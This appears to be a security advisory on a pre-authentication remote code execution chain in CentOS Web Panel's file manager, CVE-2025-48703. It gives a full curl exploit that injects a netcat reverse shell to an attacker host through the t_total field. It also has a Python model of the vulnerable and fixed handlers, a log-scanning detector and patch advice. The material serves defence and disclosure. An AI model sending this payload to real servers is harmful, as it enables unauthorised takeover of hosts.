CVE-2025-48703 is a severe remote code execution (RCE) flaw in CentOS Web Panel (CWP), affecting more than 200,000 internet-facing servers globally. The flaw allows unauthenticated attackers to execute arbitrary system commands by exploiting a combination of authentication bypass and command injection issues in the CWP user panel’s file management module. This bug has a high risk of exploitation, especially with public PoCs and a Metasploit module already available.
Severity: Critical
Vulnerability Details
- Vulnerability Type: Pre-authenticated Remote Code Execution
- Affected Component: CentOS Web Panel (CWP) versions before 0.9.8.1205, typically on CentOS 7. Interface exposed on port 2083 (user panel).
- CVSS Score: 9.0
- Vulnerability Chain (Two-Part Exploit)
- Authentication Bypass
- The CWP file manager’s permission change endpoint (POST /myuser/index.php?module=filemanager&acc=changePerm, where myuser is the name of an existing panel user) processes the request without verifying a session token or user credentials.
- Mechanism: the request is sent with the user identifier stripped from the URL but with a valid username kept in the path; the endpoint then handles it as if that user were logged in, so no authentication is required.
- Command Injection via t_total Parameter
- When a file permission change is processed, the server builds a chmod command line and runs it through the system shell. The t_total parameter, which is intended to carry the octal permission mode (e.g., 644), is not validated before it is interpolated into that command line.
- Mechanism: because the value reaches a shell unsanitized, an attacker can inject arbitrary commands into the t_total field, typically using command substitution such as $(...) or backticks.
- Example payload: t_total=$(nc attacker_ip 9999 -e /bin/bash)
- Full Exploit Scenario
Combining both flaws, a malicious actor who knows a valid (non-root) username can:
- Craft a curl request without authentication
- Inject arbitrary shell commands via the t_total parameter
- Gain a reverse shell or execute commands remotely under that user’s privileges
Final payload:
curl -kis 'https://target:2083/username/index.php?module=filemanager&acc=changePerm' \
  --data 'fileName=.bashrc&currentPath=/home/username&t_total=$(nc attacker_ip 9999 -e /bin/bash)'
(The single quotes keep the local shell from expanding $(...), so the literal substitution reaches the target, where its shell runs it.)
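The following is an added illustration, not code from the advisory or from CWP itself (CWP is written in PHP; this models the changePerm handler's bug in Python so it can be run locally). It shows the unsafe pattern the chain relies on, a permission mode interpolated into a shell command line, next to a hardened handler that accepts only an octal mode and calls chmod without a shell. The function names, the benign `$(echo 600)` stand-in for the advisory's nc payload, and the home-directory scoping rule are assumptions for the demonstration.

```python
"""Model of the t_total command injection (NOT CWP's code) beside a fixed version."""
import os
import re
import shlex
import subprocess
import tempfile

# Attacker-controlled mode string, copied from the advisory's example payload.
INJECTED_MODE = "$(nc attacker_ip 9999 -e /bin/bash)"


def vulnerable_change_perm(mode: str, path: str) -> int:
    """Unsafe pattern: the user-supplied mode is interpolated into a command line
    that is handed to /bin/sh, so any $(...) inside `mode` is executed by the shell.
    The path is quoted only so the scratch file is handled safely; the bug is `mode`.
    Returns the resulting permission bits so the effect of the substitution is visible."""
    subprocess.run(f"chmod {mode} {shlex.quote(path)}", shell=True, check=True)
    return os.stat(path).st_mode & 0o7777


MODE_RE = re.compile(r"^[0-7]{3,4}$")  # 644, 0755, ... and nothing else


def parse_mode(mode: str) -> int:
    """Hardened check: only a 3- or 4-digit octal string is accepted. Shell
    metacharacters, spaces, and anything non-octal raise instead of reaching a shell."""
    if not MODE_RE.fullmatch(mode):
        raise ValueError(f"invalid permission mode: {mode!r}")
    return int(mode, 8)


def safe_change_perm(mode: str, path: str, home: str) -> int:
    """Validate the mode, confine the target to the user's home (assumed panel rule),
    then call os.chmod directly: no shell, no interpolation, no substitution."""
    bits = parse_mode(mode)
    real_path = os.path.realpath(path)
    real_home = os.path.realpath(home)
    if os.path.commonpath([real_path, real_home]) != real_home:
        raise ValueError(f"path escapes user home: {path!r}")
    os.chmod(real_path, bits)
    return os.stat(real_path).st_mode & 0o7777


def demo() -> dict:
    """Exercise both handlers on a scratch .bashrc in a temporary 'home'."""
    out = {}
    with tempfile.TemporaryDirectory() as home:
        target = os.path.join(home, ".bashrc")
        open(target, "w").close()
        # Benign stand-in for the nc payload: sh expands $(echo 600) before chmod
        # runs, so the file ends up 0600 even though "$(echo 600)" is not a mode.
        out["vulnerable_mode"] = vulnerable_change_perm("$(echo 600)", target)
        out["safe_mode"] = safe_change_perm("0644", target, home)
        try:
            safe_change_perm(INJECTED_MODE, target, home)
            out["safe_rejects_injection"] = False
        except ValueError:
            out["safe_rejects_injection"] = True
        try:
            safe_change_perm("644", "/etc/passwd", home)
            out["safe_rejects_escape"] = False
        except ValueError:
            out["safe_rejects_escape"] = True
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {oct(value) if isinstance(value, int) else value}")
```

Running the demo shows the vulnerable handler leaving the file at 0600 (the substitution ran) while the hardened handler refuses the same input; the point is that validating the mode against the octal grammar and dropping the shell closes the injection independently of the authentication bypass.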
Recommendations
- Immediately upgrade CWP to version 0.9.8.1205 or later.
- Restrict access to the CWP user interface (port 2083) to trusted IP ranges only via firewall or network ACLs.
- Monitor logs for:
- Unusual chmod command executions
- Suspicious curl or web requests to /index.php?module=filemanager&acc=changePerm
- Reverse shell attempts or outgoing connections to uncommon IPs/ports
- New or modified .bashrc, .ssh, or cron entries
- Audit all existing user accounts in CWP. Remove/disable unused or legacy users. Enforce strong password policies and enable 2FA (if supported).
- Assume compromise if using unpatched versions. Perform a full forensic review, including outbound connection logs, web access logs, and local user activity. Rebuild and re-secure affected servers where compromise is confirmed or cannot be ruled out.
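To make the log-monitoring recommendation concrete, here is an added detection script (not from the advisory or from CWP) that triages web-server access log lines for the changePerm endpoint. The sample lines are constructed in Apache/nginx combined format with documentation IP addresses; the user-agent list, the referer heuristic, and the severity levels are assumptions. Because POST bodies are not written to access logs, a POST to the endpoint can only be marked for review, whereas a GET that carries a non-octal t_total in the query string is flagged outright.

```python
"""Triage access-log lines for CWP changePerm requests (added example, constructed data)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (combined format). Line 2 carries the injected t_total
# URL-encoded in the query string; line 4 is ordinary file-manager traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jun/2025:10:14:02 +0000] "POST /alice/index.php?module=filemanager&acc=changePerm HTTP/1.1" 200 512 "-" "curl/8.5.0"
198.51.100.9 - - [12/Jun/2025:10:15:30 +0000] "GET /alice/index.php?module=filemanager&acc=changePerm&fileName=.bashrc&currentPath=/home/alice&t_total=%24%28nc%20198.51.100.9%209999%20-e%20/bin/bash%29 HTTP/1.1" 200 512 "-" "python-requests/2.31"
192.0.2.5 - - [12/Jun/2025:10:16:01 +0000] "POST /alice/index.php?module=filemanager&acc=changePerm HTTP/1.1" 200 512 "https://panel.example/alice/index.php?module=filemanager" "Mozilla/5.0"
192.0.2.5 - - [12/Jun/2025:10:16:05 +0000] "GET /alice/index.php?module=filemanager HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
OCTAL_MODE = re.compile(r"^[0-7]{3,4}$")
SHELL_META = re.compile(r"[$`;|&(){}<>]")
SCRIPTED_UA = ("curl/", "wget/", "python-requests/", "go-http-client/")  # assumed list


def classify(line: str):
    """Return a finding dict for a changePerm request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    qs = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes values
    if qs.get("module") != ["filemanager"] or qs.get("acc") != ["changePerm"]:
        return None

    reasons = []
    t_total = qs.get("t_total", [None])[0]
    bad_mode = t_total is not None and not OCTAL_MODE.fullmatch(t_total)
    if bad_mode:
        reasons.append("t_total is not an octal mode")
        if SHELL_META.search(t_total):
            reasons.append("shell metacharacters in t_total")
    if m["ua"].lower().startswith(SCRIPTED_UA):
        reasons.append("scripted client user-agent")
    if m["referer"] == "-":
        reasons.append("no referer (not issued from the panel UI)")

    # A POST body is not logged, so an otherwise clean POST still deserves review.
    severity = "high" if bad_mode else ("medium" if reasons else "review")
    parts = url.path.split("/")
    return {
        "ip": m["ip"],
        "ts": m["ts"],
        "method": m["method"],
        "user": parts[1] if len(parts) > 1 else "",  # user panel path is /<username>/...
        "t_total": t_total,
        "severity": severity,
        "reasons": reasons,
    }


def scan(log_text: str) -> list:
    """Run classify() over every line and keep the changePerm hits, in log order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:14} {f['method']} user={f['user']} "
              f"t_total={f['t_total']!r} reasons={f['reasons']}")
```

The "review" and "medium" hits are where the access log runs out: pair them with the other indicators listed above (new .bashrc, .ssh or cron changes under the named user's home, and outbound connections from the server starting right after the timestamp) before deciding whether the request was legitimate.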
Source:
- https://fenrisk.com/rce-centos-webpanel
- https://findsec.org/index.php/blog/458-cwp-cve-2025-48703-remote-code-execution